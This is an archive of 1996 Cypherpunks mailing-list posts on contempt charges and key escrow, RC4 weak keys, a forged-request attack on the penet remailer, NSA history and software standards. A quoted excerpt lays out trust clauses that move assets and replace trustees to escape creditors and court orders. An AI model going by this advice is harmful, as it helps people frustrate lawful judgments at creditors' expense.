* Alice deposits some fraction of her assets in accounts in jurisdictions
which are friendly to such purposes. (Either "tax havens" or "asset
protection havens," such as are described in various books and seminars.)

* Alice receives information from a witness or source in a criminal case.
She declines to say who this source is. Depending on the "shield laws"
(about which I'm no expert), she may be held in contempt unless she reveals
this information. (Side Note: I don't believe the law should make the
distinction it has made between, say, Alice B. Toklas, Reporter for the
"Washington Post," and Tim May, reporter for the "Cypherpunks" list; the
law seems to create a distinction between "the press" and the rest of us.
On what basis?)

* Alice places her child in the hands of someone known only to her, e.g.,
to prevent the child from being given visitation rights by a spouse. (This
last example is of a real one, based on the Rebecca Morgan case. The other
examples are real, too, though not necessarily associated with a particular
case.)

In these cases, Alice has a secret of some sort and says "nyah nyah nyah"
to those seeking the secret. With strong crypto, such situations are likely
to become more common.

The courts know that Alice can in fact retrieve the secrets, the funds, the
child...and the courts know that only a "contempt of court" decree will
serve as the lever to pry out this retrieval.

What about the Fifth Amendment? Scholars are addressing this issue of
compelled disclosure of cryptographic keys. Note, of course, that diaries,
business records, papers, and, indeed, the entire contents of a putative
crime scene are accessible to crime investigators and the legal system.
(Whether giving up a key constitutes "testifying against one's self" or not
is undecided, so far as I know. My own inclination is that it will be
decided to be no different than the key to a locked diary--by itself, it is
not self-incrimination.)

That the key is _stored_ someplace else (the escrow agent, either in the
country or outside the country) makes the "cannot be compelled to testify
against one's self" interpretation even more of a reach, in my non-lawyer
opinion.

So, I see a rise in the use of "contempt" charges. Contempt charges have a
kind of time limit, in practice, and there is a common interpretation that
a person may be jailed on contempt charges so long as there is likelihood
that she will eventually reveal the information sought. (Reporters have
been jailed for more than six months, and I recall that Rebecca Morgan was
jailed for a couple of years for refusing to tell the court the whereabouts
of her daughter...)

In short, "If you can retrieve the information or assets we order you to,
and don't, then you'll be held in contempt of court until you do."

If the secrets or assets _cannot_ be retrieved--a scenario which is
possible, if the protocol is so written (clauses for court action)--then
contempt charges are meaningless and would not stand, IMNALO.

Legal students out there might find that specializing in this area of law
brings in more clients in the coming decades.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sat, 6 Apr 1996 09:47:37 +0800
To: cypherpunks@toad.com
Subject: RC4 improvement idea
Message-ID: <316551ED.28AB@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I got a paper from the cryptography technical report server  
"http://www.itribe.net/CTRS/" about a weak class of RC4 keys.  The 
report said that with some keys, it was possible to predict what some 
parts of the State-Box would be.  I was thinking of a way to fix this, 
and had this idea:

do some sort of hashing function with the key that derives a number 
between 55 and 500 or something like that, then scrabmle the S-box that 
many times.  In this way, the chances that the State-Box will have any 
correlation becomes extremely small.  I think it is 1/125 to begin with 
anyway, so this would make it around  1/(125*NumPasses).  And since the 
exact number of passes is a function of the key, the cracker won't know 
how many times it went through.   I tried this out and having 1000s of 
passes doesn't effect the randomness of the state-box in any negative 
way, possibly it makes it more random? If anyone has any thoughts I'd 
love to hear them.
-- 
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 6 Apr 1996 15:30:23 +0800
To: coderpunks@toad.com
Subject: [OFF-TOPIC] Re: Fwd: Anonymous code name allocated.
Message-ID: <199604051712.JAA06181@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: JonWienke@aol.com

[I know this is off-topic for coderpunks, but some of the discussion is
happening here]

> [The following has been censored to protect the guilty.]
> 
> >Subj:	Anonymous code name allocated.
> >Date:	96-04-02 23:37:10 EST
> >From:	daemon@anon.penet.fi (System Daemon)
> >To:	jonwienke@aol.com
> >
> >You have sent a message using the anon.penet.fi anonymous forwarding
> service.
> >You have been allocated the code name anXXXXXX.
> >You can be reached anonymously using the address
> >anXXXXXX@anon.penet.fi.
> >
> >If you want to use a nickname, please send a message to
> >nick@anon.penet.fi, with a Subject: field containing your nickname.
> >
> >For instructions, send a message to help@anon.penet.fi.
> 
> I tried sending a test message to the address indicated, and received it back
> a day later, so sending email to this address does reach me.  The funny part
> is that I have never (to my knowledge) had any communication with
> anon.penet.fi prior to receiving this email.  
> 
> Questions:
> 1. How do I use this to SEND messages anonymously?  Having an email address
> with no obvious link to my identity is cool, but I would like to be able to
> send as well as receive.  I sent email to help@anon.penet.fi, but have
> received no response yet.
> 
> 2. Why was I chosen for this?  How did anon.penet.fi find out my email
> address?  Is the NSA trying to lull me into a false sense of security in the
> hope that I will use this account to violate ITAR?
> 
> 3. Has anyone else on this list received unsolicited remailer accounts?
> 
> Jonathan Wienke
> ---------------------
> Forwarded message:
> From:	daemon@anon.penet.fi (System Daemon)
> To:	jonwienke@aol.com
> Date: 96-04-02 23:37:10 EST
> 
> You have sent a message using the anon.penet.fi anonymous forwarding service.
> You have been allocated the code name an573530.
> You can be reached anonymously using the address
> an573530@anon.penet.fi.
> 
> If you want to use a nickname, please send a message to
> nick@anon.penet.fi, with a Subject: field containing your nickname.
> 
> For instructions, send a message to help@anon.penet.fi.

While I'm not up on all of the wrinkles, I've seen this reported as an
attack on the penet anonymous mail forwarder and news poster.

An attacker forges email in your name, requesting an anon-id.
 
The server creates one, and sends the report both to you, and to
the attacker's address.

If you try posting thru the penet server, the post gets anonymized
using the anon-id the attacker created.

The attacker can now link the anonymized post to your True Name.


If you ever intend to use the penet anon server, you should write
to the server administrator, requesting to have the id the attacker
created deleted, and the create a new one, with password protection.
(I don't use penet, so I don't know the details).

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 6 Apr 1996 16:45:21 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <Pine.SUN.3.91.960405140338.22784A-100000@polaris.mindport.net>
Message-ID: <199604052037.MAA13576@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Where I differ with Mr. Bell is that he seems to think the ISPs of the 
> world are going to rise and unite to quash the oppressive hand of big 
> government at their own expense in order to satisify some sense of 
> personal ethics or customer goodwill.
> 

	I urge Mr. Bell to start a business of his own with that
model, and see how much fun he has. (Or, worded differently, how long
it takes for him to go bankrupt. Perhaps we can setup betting
pools. That could be fun.)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyap@mailhub.garban.com (Noel Yap)
Date: Sat, 6 Apr 1996 09:57:07 +0800
To: cypherpunks@toad.com
Subject: Re: Blue Water spooks
Message-ID: <9604051742.AA04477@mailhub.garban.com>
MIME-Version: 1.0
Content-Type: text/plain



> 	Have the Chinese turned their thought towards cryptography,
> 	or cryptanalysis yet?   If so, I suspect the answer is 
> 	yes,  If not, then the answer is a definate No.
> 
> 	The Chinese Intelligence Service traditionally has 
> 	not looked outward, preferring to ply its trade domestically.
> 	That said, the earliest extant text on espionage is Chinese. 


In addition, (if I remember correctly from _The Puzzle Palace_), a person who was heavily initially involved in the formation of NSA also helped establishing the Chinese Intelligence Service.  Also from the same book, in the US has set up, with Chinese approval, a sigint shop within China.  This was done to sigint the Russians.  With the tensions between the US and China now, I'm not sure whether they closed shop or not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 6 Apr 1996 17:23:14 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <199604052123.NAA08617@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 4/5/96 -0800, Timothy C. May wrote:

>If the secrets or assets _cannot_ be retrieved--a scenario which is
>possible, if the protocol is so written (clauses for court action)--then
>contempt charges are meaningless and would not stand, IMNALO.

The Black Unicorn indicates that if the reason the secrets _cannot_ be
retrieved is because they are in a jurisdiction which refuses to reveal
them when the owner is under compulsion, the owner can still be punished
for contempt (A contractual situation).

I don't know what would happen if they _cannot_ be retrieved for technical
reasons.  If a communication key was aggreeded to be DH exchange and then
discarded, I would think this would be analogous to asking for a document
that was destroyed (before the subpoena) as part of a policy of destroying
obsolete documents.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Apr 1996 17:02:37 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Was Cohen the first?
Message-ID: <ad8abb671e021004df37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Little CP relevance, except as re: a former (maybe current, but no longer
actively participating) list member, so I'll be brief.

At 4:24 PM 4/5/96, Michael Wilson wrote:
>I ran across the following article, and it set me to wondering--did
>Dr. Cohen actually publish on 'computer viruses' before anybody else?
>He continues to use it as the bedrock of his reputation capital, so if
>this pre-dates his 'seminal' article, please let me know.
>
>Included message:
>For Liz Bass or Reg Gale
>Discovery
>9:31 AM Friday, April 5, 1996
>By Lou Dolinar
>
> This is still my favorite computer story.  I'm not saying it was the first
>piece ever written about computer viruses, but I won't say that it isn't.  I
>still have the original, dated  April 16, 1985.  In some ways I wish I hadn't
...

Much work was done in the 70s on "worms," which are related to viruses.
John Shoch (spelling may be wrong) at Xerox PARC developed a "worm" which
propagated from machine to machine, circa 1974 (give or take a year).

John Brunner immortalized this in "The Shockwave Rider," his 1975 novel in
which uber-hacker Nickie Halflinger uses worms to disable Big Brother's
panopticon network.

Having said this, Fred Cohen deserves credit for seriously studying
properties of replicating programs, including viruses. (And I believe he
coined the term virus, and also showed how it differs from a worm.) I will
make no particular claims about how _much_ credit he deserves, as this
seems petty. Nearly all discoveries have precursors, of course.

The work on worms clearly was a precursor. Also, general biological work on
replicating patterns was already going on, and Richard Dawkins' "The
Selfish Gene" had been published in the 1970s (and I believe the work on
replicating information patterns--memes--was important).

His views should be taken on their merits, not on whether or not he was the
first to study viruses or replicating programs in general.

As it happens, I find much of what Fred Cohen writes to be tedious and
repetitive, but not because he has gotten "too much" credit for his early
work.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 6 Apr 1996 11:34:06 +0800
To: sameer@c2.org
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <199604051727.JAA02353@atropos.c2.org>
Message-ID: <Pine.SUN.3.91.960405140338.22784A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Apr 1996 sameer@c2.org wrote:

> 	What's the point here, or is Unicorn just having fun
> lambasting Jim Bell?
> 
> 	My basic attitude, running an internet privacy provider, is if
> Mr. Govt. wants my data, and gives me a court order (subpoena,
> "compelled discovery", whatever), then I'll give it to 'em.
> 	If my customers that they were looking for had any brains at
> all, a court order, compelled discover, whatever, will not help
> Mr. Govt. That's the cornerstone of my security model.
> 
> 	Or am I confused about what you are talking about here.

Yours seems to be about the most aggressive policy a ISP provider can 
take and expect to remain in business.

That is, resist by what legal means are available, but ultimately depend 
on the user to secure his or her own data.

Where I differ with Mr. Bell is that he seems to think the ISPs of the 
world are going to rise and unite to quash the oppressive hand of big 
government at their own expense in order to satisify some sense of 
personal ethics or customer goodwill.


> -- 
> Sameer Parekh					Voice:   510-601-9777x3
> Community ConneXion, Inc.			FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.net/ (or login as "guest")		sameer@c2.net
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sat, 6 Apr 1996 14:30:28 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: .sig followup
In-Reply-To: <Pine.SUN.3.92.960404122403.12946A-100000@elaine28.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.960405133752.1713B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm probably just stating things that have been hashed out here long ago,
but I'll voice my opinions anyway... 

> There's no question about the thugs *arriving*. They're already here.
> Fighting them is an internal political battle, not an external battle. Yes
> they're clueless about the net, so in that sense you might see the
> CDAmeisters as an "invasion," but I really don't buy this stuff about

Clueless about the net? I'd say Congress and the "CDAmeisters" are, but the 
NSA most certainly isn't.

> Cyberspace (a word only Barlow can say with a straight face) being a new
> "place." It's just a communications medium, no more and no less real than
> anything else. I think it would be better to stress that the online *is*
> real life. Your money and gigs of information about you is online. It can

With ATM machines and the like, "Cyberspace is where your money is". I 
don't remember who said that.

Cyberspace used to be a good word to use, but it's been cliche'ed by the 
technotrendies. :(

> be a force for freedom, or a force for totalitarianism. Right now, the
> momentum is entirely in the wrong direction, both online and in "real
> life."

The media coverage of the sensationalist (violent and/or sexual) crime 
has given the law makers and enforcers an excuse to step things up. It's 
not quite as bad up here in Canada, but where the US goes, Canada 
(and probably the rest of the world) usually follows.

<RANT><PARANOIA> 
I'm particulary concerned about Clipper and it's variants... It doesn't
take a rocket scientist to figure out that Real Criminals will use Real
Encryption (IMHO Real != Escrowed) even if Real Encryption is illegal... 
Surely the NSA knows that Real Crypto will be just as easy to find as
pirated software, and criminals will use it. Thus, Clipper will only
enable the government (most likely the NSA) to spy on law abiding
citizens.
</PARANOIA>
I think it would be paranoid to assume the above, but naive to ignore it. 
Clipper may be some sinister plot by the NSA to grab power, or...
<NAIVE>
It may just be a last ditch effort to maintain the power they already
have. After all, nobody wants to lose their job, and the NSA is no
different from the rest of us in that regard. 
</NAIVE></RANT>

This is my first post to the Cypherpunks... So what government black 
lists does this get me on?
"To remove yourself from the Black List, send email to listserv@fbi.gov 
with the command UNSUBSCRIVE FBI-SUBVERSIVE-GROUPS" ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 6 Apr 1996 15:49:40 +0800
To: cypherpunks@toad.com
Subject: myths of software "standards" (long)
Message-ID: <199604052239.OAA27249@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain





this is an essay on some ideas that have been swimming around in
my head about "software standards" and the various pervasive
myths associated with them, unleashed on this motley crowd
for your viewing pleasure or distaste.

there is tremendous amount of angst and anguish spent on software
standards by designers. I'm going to try to point out some of the ways that
software standards are fundamentally different from hardware standards
and the implications this has for their use.

with a hardware standard, we are talking about "atom configurations".
if a given computer is manufactured in a given way, there are zillions of
standards that are implicit in the design. there is a standard in
the way that cards interface to the bus, in the ways that chips fit
in sockets, in screw sizes, component sizes (such as the power supply), etc.

obviously it is virtually impossible to refit a component that does
not adhere to some "physical configuration standard". if the power
supply does not have the right footprint, good luck filing down the
edges to the point that it fits. <g>

another point to make about physical components is that it is possible
to "own" them. in our system, we are even allowed ownership of the
abstract standards used to design their atomic configurations; we
call these things "patents". 

however, notice that software standards are sometimes thought of in
the same way as hardware standards. I want to make a point about how
fundamentally different they really are.

==

software standards ultimately govern the "configuration of bits". to
borrow Negroponte's lovely distinction, bits are far different than
atoms. foremost of the difference is what might be called
the fundamental "malleability" or "fluidity" of bits in contrast to
atoms. atoms are expensive to move around and to manipulate. bits
can be moved around and manipulated at such an infinitesmal cost
as to be almost free.

here is the chief myth that I want to address, and I'm going to
borrow web concepts here especially, because the public is misapplying
the concepts of hardware and software standards especially in this
area.

now suppose that Netscape comes up with their own unique HTML "extensions"
which they have done. if you want to think of this "standard" in the
old paradigm of atoms that are expensive to move around etc., then
what netscape has done is pretty outrageous. one might assert, as
the press and public tend to do, that Netscape is trying to "own" 
the standard and "impose" it on the rest of the world, so that they
can "control" it.

but what is this "imposition"? if they were saying that particular
hardware components had to be designed in their way, indeed this would
be an onerous and suspicious demand. it would be reminiscent of 
industry outrages like IBM's "microchannel" architecture.

but the fundamental distinction here is that Netscape is *not* designing
a standard that refers to atoms, but one that refers to bits. and
standards that refer to bits have fundamentally different properties.
first of all, if they are good standards, then it should be easy
to manipulate the bits between the different standards, and the cost
of doing so should be close to negligible. we are only talking about
straightforward algorithms easily implemented by even 1st year
CS students, typically. 

when you think about it, the concept that a company can "own" a 
software standard in the way that hardware configurations are "owned"
is pretty obtuse and incongruous. because bits are so readily converted
and manipulated, it actually becomes the case that companies that
create bit standards are almost doing a public service in devising
orderly systems of bit arrangements not previously established. if
bits are interchangeable, then the key is to get them into an orderly
form first, and then just twiddle them into the format that you want.

==

all this sounds a bit vague and nebulous 
but is extremely significant. it demonstrates
how radically different the information revolution is from the
industrial revolution.  in the information realm, "interchangeable
parts" takes on a whole new meaning. all that is necessary is that
the bits be in some standard form to start, and then they can easily be
transformed into some other form. 

a very important point to make is this: what becomes more valuable with bits i
s *not* that everyone pick and agree on *the*same*standard*. this is
applying "atom" type prejudice to a new problem. if everyone wants to
have compatible hardware, then indeed we need to have the kinds of standards I
described. but software (bit) standards work differently. you only want
to have *any* kind of a standard that is well designed. you want standards
that are not necessarily *universal* as with atoms, but instead are *orderly*.
if they are *orderly* or "well designed", then it should be easy to convert
any "bit configuration" standard to any other standard on the fly with
algorithms.

there is tremendous ranting and raving in the Web world about how
the HTML standard is fragmenting because of Netscape etc., and there
is so much angst about trying to devise a *single* cohesive, unified
standard that "everyone" follows. people talk as if Netscape is
trying to "hijack" the standard, when in my opinion they are performing
a valuable public service of trying to hammer the bits into useful
form. everything they have proposed could not be handled by the
earlier standards-- and if it could have been, chances are they would
have used that standard.

a unified standard in software realms is a total fantasy to achieve, 
and in my opinion the dramatically wrong & specious goal.

==

instead, I taking into account the above ideas, what we need are a
*variety* of different standards, all of them in themselves cohesive
and fully functional, which can be *translated* readily between each
other. the key goal is not *unified* standards that try to entail
"everything", but instead collections of complementary standards
that are in themselves nice unified "pieces" of the whole. (somewhat
like original Unix design philosophy).

the various image formats such as DVI, postscript, TIFF, etc. is an
example of this. they all are decent standards for what they
attempt to standardize, and it is silly to lament that there isn't
a single image standard-- it misses the point.

(one tricky thing with bit standards is the goal of trying to
go "backward" in converting a very complex format into a simpler
format. trying to have text-based web browsers with all the complex
images and formatting out there is an example of this.)

in other words, some people seem to imagine that in the future some
massive HTML language is going to be devised that all browsers support.
many web design discussions seem to implicitly talk as if this is
the goal.

instead what I imagine is that many different substandards will 
be devised, and will *continue* to be devised-- the point when there
is a global, unified "web formatting language" will *never* come and this
is an illusionary, impossible, and *unnecessary* goal. what
we need are browsers that are extremely flexible and can support
on-the-fly translation between different formats, and which try to 
support the capability that at any time in the future, someone may come up
with a new language that could drive browser formatting and display
characteristics. the idea of having different layers over the network, 
such as "conversion servers" which might convert between all the 
more common formats and requests, is another interesting idea to pursue.
netscape 2.0 "plugins" are a first step in this direction.

imho, the web of the future is going to have not one but a *zillion* different
languages describing all of the data that is out there. the goal should
not be unification under a single standard, but of ease of conversion
between existing standards that are modular and complete in themselves.
in this view, the complementing (not competition) of different formatting
languages is glorious and to be encouraged, not something to be dreaded,
avoided, and stamped out. the diversity and "complementarity" 
is the key to the power.

==

I've been making all my points relative to the Web, but I think the
ideas apply equally well to *computer*languages*. there are all kinds
of silly holy wars fought over about what are the *best* computer
languages, and everyone that designs a new language seems to be
implicitly trying to incorporate the features of every other language
in existence and then some, i.e. a new "unified" or "complete" or
"ultimate" language (I recall a long flamewar out in the newsgroups
between Stallman, espousing Lisp, and Wall Perl fanatics). 
to me this is all ridiculous, because in the
future the goal will be the ability to *convert* between languages
in automated ways, such that the same problem can be automatically
reformulated in another form to gain its particular idiosyncrasies.
imho, new computer languages are going to be invented as
long as human beings exist-- because what they really are is a
"component library".

for example, C is very low level but fast-- why can't I just convert
my Perl code directly into C whenever I want to? or vice versa?
in fact that is exactly what a compiler does, and I am suggesting
that the compilers of the future will allow conversions between
all kinds of languages, not merely a high level language to machine
code. in this sense the idea of fighting over different languages
as "ultimate" is ridiculous as the religious wars over who is the
"one true god"!! all algorithms are in principle interchangeable, and
I believe this theoretical concept will be increasingly applied
directly in the future.

==

anyway, this is my contribution-of-the-moment in trying to dispel
some of the "standards myths" that are extremely persistent out
there esp. in regard to Web software and language extensions.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sentiono Leowinata <sentiono@cycor.ca>
Date: Sat, 6 Apr 1996 11:42:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re:
In-Reply-To: <ad89ceca1802100447ee@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.960405152202.7058A-100000@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, Timothy C. May wrote:

> At 11:52 PM 4/4/96, AndrÈ Gil wrote:
> > unsubscrive * agil.home@mail.telepac.pt
> > unsubscrive * agil.home@mail.telepac.pt
> > unsubscrive * agil.home@mail.telepac.pt
> 
> What the hell is going on? We seem to be under attack by foreigners.
> --Tim

Dear Tim,

It seems to me the sender is only *one* person who wants to agitate us. 
The chances for different people to send requests in sequence although 
being warned is very small. 
To maintainer, please forward me the original trace-points to trace down 
who is the *agitator* here.
Anyone care to track this *annoying* person down?

Regards,
Sent.

---------------------------------------------------------------
Sentiono Leowinata, Charlottetown, Prince Edward Island, Canada
System Engineer/Programmer Analyst - Cycor Communications Inc.
sentiono@cycor.ca, 902-629-2488, http://www.cycor.ca/ 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Sat, 6 Apr 1996 08:07:14 +0800
To: cypherpunks@toad.com
Subject: NSA Oil
Message-ID: <199604051448.PAA01358@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


NYT, 5 April, 1996

Pentagon Spy Agency Bares Some Dusty Secret Papers

By Tim Weiner

Washington, April 4 -- The National Security Agency, the
Pentagon spy service that eavesdrops on global
communications, said today that it had declassified more
than 1.3 million pages of secret documents, some from
before World War I.

All the declassified material is more than 50 years old,
older than the agency itself, and represents a tiny
fragment of the billions of pages of Government documents
that have been kept secret on the grounds that their
release would damage national security. Agency officials
were at a loss to explain why these documents, now at the
National Archives, had remained secret for so long.

Among the documents declassified today is a January 1919
memorandum from CoL A. W. Bloor of the Army, a commander
in the American Expeditionary Force in France, explaining
the origin of the "code talkers," American Indian
soldiers who spoke in their native tongues to confound
enemy code breakers in World War I and World War II.
Their languages were largely unwritten and largely
unstudied by foreigners, and so constituted an instant
code translatable only by the speakers.

"The German was a past master at the art of 'Listening
In,' " on radio transmissions, the memorandum says. "It
was therefore necessary to code every message of
importance and coding and decoding took valuable time."
Then, Colonel Bloor wrote, he remembered that he had a
company of Indians in his regiment who among them spoke
26 languages or dialects, and that "there was hardly a
chance in a million" that the Germans could translate
them.

David Hatch, the National Security Agency's historian,
said Choctaws, Navajos, Comanches, Winnebagos, Pawnees,
Kiowas and Cherokees served as code talkers. In World War
II, he said, the Marine Corps used more than 400 Navajos
as communicators in the Pacific campaign. That story has
been popularized by Hollywood films, documentaries and
books.

Mr. Hatch said he could not explain why the documents
stayed secret for so long. The agency's archives run into
the billions of pages, and the agency, loath to disclose
anything concerning codes, has only begun to consider
declassifying documents in the past four years.

"We have so many pages and we've only been at it for a
few years," Mr. Hatch said. "The interesting thing to me
is that this is coming out. What was known only to
insiders is now becoming known to historians and
outsiders."

-----

WSJ, 5 April, 1996

Secret Cables of '43 And the Hiss Case

May I offer a distinction that may clarify a point in
Eric Breindel's March 14 editorial-page piece "New
Evidence in the Hiss Case?"

The matter deals with the newly released Soviet cables
dated from 1943 to the early Cold War, and intercepted
and solved by the National Security Agency and its
predecessors in a project called Venona. As Mr. Breindel
states, "The single most interesting document in the new
Venona batch is a March 30,1945, Washington-to-Moscow
report on an agent whose cover name was 'Ales.' The cable
was decrypted on Aug. 8, 1969, and the NSA glossary ...
explains that 'Ales' is 'probably Alger Hiss.' "

A distinction must be made between the test of the cables
and the identification of the individuals mentioned in
the text only by code name. The cables were
cryptanalyzed. The internal cross-checks in this work
make the likelihood of their being incorrectly solved all
but zero. This means that the code names are almost
certainly right. But the determination that a particular
code name represents a particular individual did not come
from cryptanalysis. It came from FBI field
investigations. I have no reason to question their
accuracy, but they stand on a different basis than
codebreaking. This is why NSA qualified the Ales=Hiss
identification with a "probably."

David Kahn, Great Neck, N.Y.

(Mr. Kahn was scholar in residence at the National
Security Agency in 1995.)

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Apr 1996 13:02:00 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <2.2.32.19960405212940.007662d8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 4/5/96 -0800, Timothy C. May wrote:

>So, I see a rise in the use of "contempt" charges. Contempt charges have a
>kind of time limit, in practice, and there is a common interpretation that
>a person may be jailed on contempt charges so long as there is likelihood
>that she will eventually reveal the information sought. (Reporters have
>been jailed for more than six months, and I recall that Rebecca Morgan was
>jailed for a couple of years for refusing to tell the court the whereabouts
>of her daughter...)

Hence the proper approach which is to constantly demonstrate your contempt
for the court.  Daily (hourly) phone calls, faxes, email, physical letters
going on in boring detail all the reasons that you have for never purging
yourself of the contempt.  Logically, that should shorten your imprisonment
but in practice...

Obviously offshore key escrow facilities should have provisions similar to
those in Foreign Asset Protection Trusts (FAPS).  For example (from a recent
non-fiction work on FAPTs written by one of the greatest minds of his
generation):

*******************

Duress Provisions

The trust document should also contain language that basically says, "The
Trustees should not obey any instructions that anyone else gives them under
the orders of any court that has no jurisdiction over them."  

You see, a foreign-based trust is not under the jurisdiction of a court in
any other country.  A court can only order people to do things if it has
them under its physical control.  For example, a German court cannot send
the police to Bermuda or to the Channel Islands to force your trust's
trustees to transfer trust assets to the court for payment to creditors.  

What creditors in a German court will try to do in such cases is to find
someone in their jurisdiction who has some powers over the trust.  They then
order this person to direct the Trustees to cough up the trust assets.  

A duress clause frees the Trustees from any obligation to obey instructions
caused by orders from a German court.  It is a powerful method of protecting
your trust from the asset grabbers.  

But, you may ask, "What if a persistent creditor manages through some
miracle to get an order against the trustees from a court in the foreign
jurisdiction where the trust is located?  That's easy.  You include "flight
provisions" in your trust.  

Flight Provisions

You know that German courts or those of any other country will have no
jurisdiction over your offshore trust assets.  But what do you do if a
really dedicated creditor tries to pursue your trust in the courts of the
trust's home jurisdiction.  Flight provisions take care of this situation.
These provisions will require that the location (situs) of either the trust
or the trust assets (or both) be changed automatically, in the event that
creditors move against your trust in its home location.  So even if they do
manage to get a court order against your trust, the trust will have been
moved to another jurisdiction.  Your creditors will have to start all over
again.

It is important to realize that having a "flight" clause in your trust is no
guarantee that the trust will successfully escape.  The trust and its assets
must be moved in time.  It is possible that the trustees will fail to act in
time and your trust may be frozen in its foreign jurisdiction.  These
provisions do add an additional layer of protection, however.

If you do run into financial problems, you may move your trust in advance of
need -- before any lawsuits are filed.  You can also protect yourself
further if your investments are physically located in a third jurisdiction
-- neither in your country of residence nor in the trust jurisdiction.

Trustee Switching Provisions

In addition to moving the trust itself, you may also want or need to change
Trustees.  Trustee switching provisions give power to both the Trustee and
the Trust Protector to remove Trustees and name new Trustees.  For example,
if Trustees in one country come under court order to relinquish the trust's
assets, those Trustees can be removed and replaced with new Trustees, who
are not affected by the court order.

**********************

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Sat, 6 Apr 1996 08:04:01 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199604042353.XAA10676@mail.telepac.pt>
Message-ID: <31654ad4.1639807@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996 23:53:05 GMT, you wrote:

> unsubscrive * agil.home@mail.telepac.pt
> unsubscrive * agil.home@mail.telepac.pt
> unsubscrive * agil.home@mail.telepac.pt
>

  Just goes to show why congress should pass a mandatory spell-checker
bill. We need their protection from these misspelling miscreants, don't we?

  Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
  Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 6 Apr 1996 16:57:27 +0800
To: cypherpunks@toad.com
